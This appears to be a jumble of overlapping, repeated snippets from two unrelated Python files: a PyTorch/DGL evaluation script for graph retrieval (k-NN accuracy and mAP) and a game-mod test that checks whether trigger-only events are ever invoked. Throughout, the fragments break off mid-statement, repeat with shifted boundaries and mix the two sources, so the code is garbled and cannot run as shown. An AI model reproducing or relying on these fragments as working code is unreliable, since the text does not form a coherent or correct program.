combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix,", "distance = nets # switch to test mode net.eval() distance.eval() end = time.time()", "__author__ = \"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time", "if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) d =", "0 best_map = 0 early_stop_counter = 0 if args.load is not None: print('Loading", "from utils import load_checkpoint, knn_accuracy, mean_average_precision from models import models, distance from data.load_data", "= g.gdata['std'].cuda() # Output g = net(g) d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d)", "net(g) d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query =", "g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query", "target_gallery, target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc", "& Set random seed args.cuda = args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed)", "validation=False): batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance =", "args = Options().parse() print('Parameters:\\t' + str(args)) # Check cuda & Set random seed", "net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch = 0 best_map = 0 early_stop_counter =", "if validation: target_combined_query = target_query combined_dist_matrix = dist_matrix else: print('* Test No combine", "mode net.eval() distance.eval() end = 
time.time() dist_matrix = [] start = time.time() with", "and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and Load if", "acc, meanap def main(): print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin,", "import torch import glob import numpy as np import time import os #", "target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time x Test {b_time.avg:.3f}'", "from loss.contrastive import ContrastiveLoss, TripletLoss import dgl __author__ = \"<NAME>\" __email__ = \"<EMAIL>\"", "ContrastiveLoss, TripletLoss import dgl __author__ = \"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader, gallery_loader,", "load_data from loss.contrastive import ContrastiveLoss, TripletLoss import dgl __author__ = \"<NAME>\" __email__ =", "retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time", "g_gallery.gdata = {'std': torch.cat(gdata)} target_query = [] for i, (g, target) in enumerate(data_loader):", "combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP retrieval", "Own modules from options import Options from Logger import LogMetric from utils import", "= dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix,", "= {'std': torch.cat(gdata)} target_query = [] for i, (g, target) in enumerate(data_loader): #", "os # Own modules from options import Options from Logger import LogMetric from", "net.eval() distance.eval() end = time.time() dist_matrix = 
[] start = time.time() with torch.no_grad():", "modules import torch import glob import numpy as np import time import os", "device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net, distNet = net.cuda(), distNet.cuda() criterion = criterion.cuda()", "list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query =", "for j, (g, target) in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() #", "== target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) #", "g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query = [] for", "mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f}", "is not None: print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch']", "= load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers,", "g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query = [] for i,", "models, distance from data.load_data import load_data from loss.contrastive import ContrastiveLoss, TripletLoss import dgl", "Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return", "= target_query combined_dist_matrix = dist_matrix else: print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix, 
target_gallery,", "args.cuda = args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) #", "target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery =", "= g.gdata['std'].cuda() # Output g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata", "mean_average_precision from models import models, distance from data.load_data import load_data from loss.contrastive import", "if args.load is not None: print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch", "= np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query combined_dist_matrix = dist_matrix else: print('* Test", "valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net", "= Options().parse() print('Parameters:\\t' + str(args)) # Check cuda & Set random seed args.cuda", "if __name__ == '__main__': # Parse options args = Options().parse() print('Parameters:\\t' + str(args))", "x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap def main(): print('Loss &", "# switch to test mode net.eval() distance.eval() end = time.time() dist_matrix = []", "torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and Load if args.load is None:", "test_gallery_loader, [net, distNet], args.cuda) if __name__ == '__main__': # Parse options args =", "at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, 
test_gallery_loader, [net, distNet], args.cuda) if", "g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery))", "from Logger import LogMetric from utils import load_checkpoint, knn_accuracy, mean_average_precision from models import", "else: print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix", "net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery", "hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check CUDA') if args.cuda and args.ngpu > 1:", "Graph classification \"\"\" # Python modules import torch import glob import numpy as", "torch.no_grad(): g_gallery = [] target_gallery = [] for j, (g, target) in enumerate(gallery_loader):", "dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query", "target_combined_query = target_query combined_dist_matrix = dist_matrix else: print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix,", "target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query combined_dist_matrix = dist_matrix else: print('*", "def test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap", "= distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if", "= \"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time =", 
"target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in", "= 0 early_stop_counter = 0 if args.load is not None: print('Loading model') checkpoint", "0 early_stop_counter = 0 if args.load is not None: print('Loading model') checkpoint =", "torch.cat(gdata)} target_query = [] for i, (g, target) in enumerate(data_loader): # Prepare input", "No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1])", ".5f} Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap def main():", "print('\\t* Data Parallel **NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA')", "= LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance = nets #", "None: print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map =", "{epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if __name__ ==", "args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and Load if args.load is None: raise Exception('Cannot", "i, (g, target) in enumerate(data_loader): # Prepare input data if cuda: g.to(torch.device('cuda')) g.gdata['std']", "nets, cuda, validation=False): batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net,", "print_function, division \"\"\" Graph classification \"\"\" # Python modules import torch import glob", "end = time.time() 
dist_matrix = [] start = time.time() with torch.no_grad(): g_gallery =", "= dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query = [] for i, (g, target)", "TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader,", "load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model at epoch", "= [] for j, (g, target) in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] =", "batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time x Test {b_time.avg:.3f}' .format(acc=acc,", "== '__main__': # Parse options args = Options().parse() print('Parameters:\\t' + str(args)) # Check", "net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model at epoch {epoch}", "distNet = net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch = 0 best_map = 0", "g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery)", "= net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'], g_gallery))", "import LogMetric from utils import load_checkpoint, knn_accuracy, mean_average_precision from models import models, distance", "= nets # switch to test mode net.eval() distance.eval() end = time.time() dist_matrix", "(g, target) in enumerate(data_loader): # Prepare input data if cuda: g.to(torch.device('cuda')) g.gdata['std'] =", "g = net(g) d = distance(g, g_gallery, 
mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix)", "args.ngpu > 1: print('\\t* Data Parallel **NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if", "print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if __name__ == '__main__': # Parse options", "load_checkpoint, knn_accuracy, mean_average_precision from models import models, distance from data.load_data import load_data from", "= models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check CUDA') if args.cuda", "test mode net.eval() distance.eval() end = time.time() dist_matrix = [] start = time.time()", "from __future__ import print_function, division \"\"\" Graph classification \"\"\" # Python modules import", "Prepare input data if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g =", "print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix =", "criterion.cuda() start_epoch = 0 best_map = 0 early_stop_counter = 0 if args.load is", "gallery_loader, nets, cuda, validation=False): batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter()", "print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size,", "target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query combined_dist_matrix" ]
[ "detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number of individuals: ')", "detemine the market prices of [x,y]: ') income=input('Please detemine the income of individual:", "determine the number of individuals: ') import Consumer_class Market_D=[0,0] for i in range(nper):", "') income=input('Please detemine the income of individual: ') par=input('Please detemine the parameters of", "individual: ') par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number", "detemine the income of individual: ') par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ')", "the income of individual: ') par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please", "Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number of individuals: ') import Consumer_class Market_D=[0,0] for", "') par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number of", "prices of [x,y]: ') income=input('Please detemine the income of individual: ') par=input('Please detemine", "the market prices of [x,y]: ') income=input('Please detemine the income of individual: ')", "of [x,y]: ') income=input('Please detemine the income of individual: ') par=input('Please detemine the", "the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number of individuals: ') import", "income of individual: ') par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine", "parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number of individuals: ') import Consumer_class", "market prices of [x,y]: ') income=input('Please detemine the income of individual: ') par=input('Please", "price=input('Please detemine the market prices of [x,y]: ') income=input('Please detemine the income of", "[x,y]: ') 
income=input('Please detemine the income of individual: ') par=input('Please detemine the parameters", "income=input('Please detemine the income of individual: ') par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]:", "of individual: ') par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the", "of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number of individuals: ') import Consumer_class Market_D=[0,0]", "par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number of individuals:", "the number of individuals: ') import Consumer_class Market_D=[0,0] for i in range(nper): A=Consumer_class.Consumer(price,income,par)", "individuals: ') import Consumer_class Market_D=[0,0] for i in range(nper): A=Consumer_class.Consumer(price,income,par) Market_D+=A.utility_max() print Market_D", "') nper=input('Please determine the number of individuals: ') import Consumer_class Market_D=[0,0] for i", "of individuals: ') import Consumer_class Market_D=[0,0] for i in range(nper): A=Consumer_class.Consumer(price,income,par) Market_D+=A.utility_max() print", "nper=input('Please determine the number of individuals: ') import Consumer_class Market_D=[0,0] for i in", "number of individuals: ') import Consumer_class Market_D=[0,0] for i in range(nper): A=Consumer_class.Consumer(price,income,par) Market_D+=A.utility_max()" ]
[ "events are triggered from somewhere # If they not - they'll never be", "If they not - they'll never be triggered # By Pelmen, https://github.com/Pelmen323 ##########################", "https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class import Events", "part triggered_events_id[event_id] = 0 # Default value is set to zero # 3.", "'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id = dict() invoked_events_id =", "event in all_events: if \"is_triggered_only = yes\" in event: pattern_matches = re.findall('id =", "= re.findall('id = .*', event) event_id = pattern_matches[0].strip('\\t').strip() # Only first match is", "used for event in invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event] += 1 results", "== 0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only = yes' attr but are never", "is taken if '#' in event_id: event_id = event_id[:event_id.index('#')].strip() # Clean up comments", "event_id = event_id[5:].strip() # Remove \"id =\" part triggered_events_id[event_id] = 0 # Default", "files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. 
Check if", "triggered_events_id[event] += 1 results = [i for i in triggered_events_id.keys() if triggered_events_id[i] ==", "check if \"is_triggered_only = yes\" events are triggered from somewhere # If they", "if '#' in event_id: event_id = event_id[:event_id.index('#')].strip() # Clean up comments event_id =", "= pattern_matches[0].strip('\\t').strip() # Only first match is taken if '#' in event_id: event_id", "from ..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0']", "Get the \"triggered only events\" for event in all_events: if \"is_triggered_only = yes\"", "= [] triggered_events_id = dict() invoked_events_id = [] # 1. Get all events", "# Only first match is taken if '#' in event_id: event_id = event_id[:event_id.index('#')].strip()", "\"id =\" part triggered_events_id[event_id] = 0 # Default value is set to zero", "= Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get the \"triggered only events\" for event in", "triggered_events_id[event_id] = 0 # Default value is set to zero # 3. Get", "events have 'is_triggered_only = yes' attr but are never triggered from outside. Check", "set to zero # 3. Get all events triggered in files triggered_events_id =", "DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. Check if events are used", "if \"is_triggered_only = yes\" in event: pattern_matches = re.findall('id = .*', event) event_id", "# Test script to check if \"is_triggered_only = yes\" events are triggered from", "[] triggered_events_id = dict() invoked_events_id = [] # 1. 
Get all events code", "0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only = yes' attr but are never triggered", "Clean up comments event_id = event_id[5:].strip() # Remove \"id =\" part triggered_events_id[event_id] =", "they not - they'll never be triggered # By Pelmen, https://github.com/Pelmen323 ########################## import", "zero # 3. Get all events triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES)", "never be triggered # By Pelmen, https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class import", "= DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. Check if events are", "# If they not - they'll never be triggered # By Pelmen, https://github.com/Pelmen323", "from somewhere # If they not - they'll never be triggered # By", "ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1',", "=\" part triggered_events_id[event_id] = 0 # Default value is set to zero #", "+= 1 results = [i for i in triggered_events_id.keys() if triggered_events_id[i] == 0]", "'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id =", "'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id = dict() invoked_events_id", "# 4. 
Check if events are used for event in invoked_events_id: if event", "in triggered_events_id.keys(): triggered_events_id[event] += 1 results = [i for i in triggered_events_id.keys() if", "########################## # Test script to check if \"is_triggered_only = yes\" events are triggered", "event_id[5:].strip() # Remove \"id =\" part triggered_events_id[event_id] = 0 # Default value is", "= [] # 1. Get all events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) #", "script to check if \"is_triggered_only = yes\" events are triggered from somewhere #", "be triggered # By Pelmen, https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class import DataCleaner,", "3. Get all events triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id =", "they'll never be triggered # By Pelmen, https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class", "# 2. Get the \"triggered only events\" for event in all_events: if \"is_triggered_only", "Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. 
Check if events are used for event in invoked_events_id:", "triggered from somewhere # If they not - they'll never be triggered #", "= event_id[5:].strip() # Remove \"id =\" part triggered_events_id[event_id] = 0 # Default value", "triggered_events_id.keys(): triggered_events_id[event] += 1 results = [i for i in triggered_events_id.keys() if triggered_events_id[i]", "event in invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event] += 1 results = [i", "in event: pattern_matches = re.findall('id = .*', event) event_id = pattern_matches[0].strip('\\t').strip() # Only", "event_id: event_id = event_id[:event_id.index('#')].strip() # Clean up comments event_id = event_id[5:].strip() # Remove", "code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get the \"triggered only events\" for", "yes\" in event: pattern_matches = re.findall('id = .*', event) event_id = pattern_matches[0].strip('\\t').strip() #", "[] # 1. Get all events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2.", "events are used for event in invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event] +=", "Test script to check if \"is_triggered_only = yes\" events are triggered from somewhere", "Only first match is taken if '#' in event_id: event_id = event_id[:event_id.index('#')].strip() #", "if events are used for event in invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event]", "all events triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True)", "1. Get all events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. 
Get the", "comments event_id = event_id[5:].strip() # Remove \"id =\" part triggered_events_id[event_id] = 0 #", "first match is taken if '#' in event_id: event_id = event_id[:event_id.index('#')].strip() # Clean", "to check if \"is_triggered_only = yes\" events are triggered from somewhere # If", "# Clean up comments event_id = event_id[5:].strip() # Remove \"id =\" part triggered_events_id[event_id]", "in triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only = yes'", "'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id = dict()", "'is_triggered_only = yes' attr but are never triggered from outside. Check console output\")", "i in triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only =", "\"triggered only events\" for event in all_events: if \"is_triggered_only = yes\" in event:", "= ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events =", "is set to zero # 3. Get all events triggered in files triggered_events_id", "= yes\" events are triggered from somewhere # If they not - they'll", "= 0 # Default value is set to zero # 3. Get all", "invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. 
Check if events are used for event", "Pelmen, https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class import", "yes\" events are triggered from somewhere # If they not - they'll never", "in event_id: event_id = event_id[:event_id.index('#')].strip() # Clean up comments event_id = event_id[5:].strip() #", "import DataCleaner, ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1',", "\"is_triggered_only = yes\" in event: pattern_matches = re.findall('id = .*', event) event_id =", "= .*', event) event_id = pattern_matches[0].strip('\\t').strip() # Only first match is taken if", "if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only = yes' attr but", "'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id", "= yes\" in event: pattern_matches = re.findall('id = .*', event) event_id = pattern_matches[0].strip('\\t').strip()", "are used for event in invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event] += 1", "# 1. Get all events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. 
Get", "..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1',", "ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only = yes' attr but are never triggered from", "1 results = [i for i in triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results,", "triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only = yes' attr but are", "in all_events: if \"is_triggered_only = yes\" in event: pattern_matches = re.findall('id = .*',", "= Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. Check if events are used for event in", "for event in all_events: if \"is_triggered_only = yes\" in event: pattern_matches = re.findall('id", "have 'is_triggered_only = yes' attr but are never triggered from outside. Check console", "[i for i in triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events have", "event_id = event_id[:event_id.index('#')].strip() # Clean up comments event_id = event_id[5:].strip() # Remove \"id", "invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event] += 1 results = [i for i", "0 # Default value is set to zero # 3. Get all events", "event in triggered_events_id.keys(): triggered_events_id[event] += 1 results = [i for i in triggered_events_id.keys()", "value is set to zero # 3. 
Get all events triggered in files", "for event in invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event] += 1 results =", "Get all events triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner,", "from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2',", "import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner:", ".*', event) event_id = pattern_matches[0].strip('\\t').strip() # Only first match is taken if '#'", "pattern_matches[0].strip('\\t').strip() # Only first match is taken if '#' in event_id: event_id =", "Check if events are used for event in invoked_events_id: if event in triggered_events_id.keys():", "# By Pelmen, https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from", "object): all_events = [] triggered_events_id = dict() invoked_events_id = [] # 1. Get", "= dict() invoked_events_id = [] # 1. Get all events code all_events =", "for i in triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only", "triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only = yes' attr", "- they'll never be triggered # By Pelmen, https://github.com/Pelmen323 ########################## import re from", "Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. 
Get the \"triggered only events\" for event in all_events:", "re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1',", "if event in triggered_events_id.keys(): triggered_events_id[event] += 1 results = [i for i in", "lowercase=True) # 2. Get the \"triggered only events\" for event in all_events: if", "# 3. Get all events triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id", "not - they'll never be triggered # By Pelmen, https://github.com/Pelmen323 ########################## import re", "invoked_events_id = [] # 1. Get all events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True)", "events\" for event in all_events: if \"is_triggered_only = yes\" in event: pattern_matches =", "match is taken if '#' in event_id: event_id = event_id[:event_id.index('#')].strip() # Clean up", "# Remove \"id =\" part triggered_events_id[event_id] = 0 # Default value is set", "\"is_triggered_only = yes\" events are triggered from somewhere # If they not -", "..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 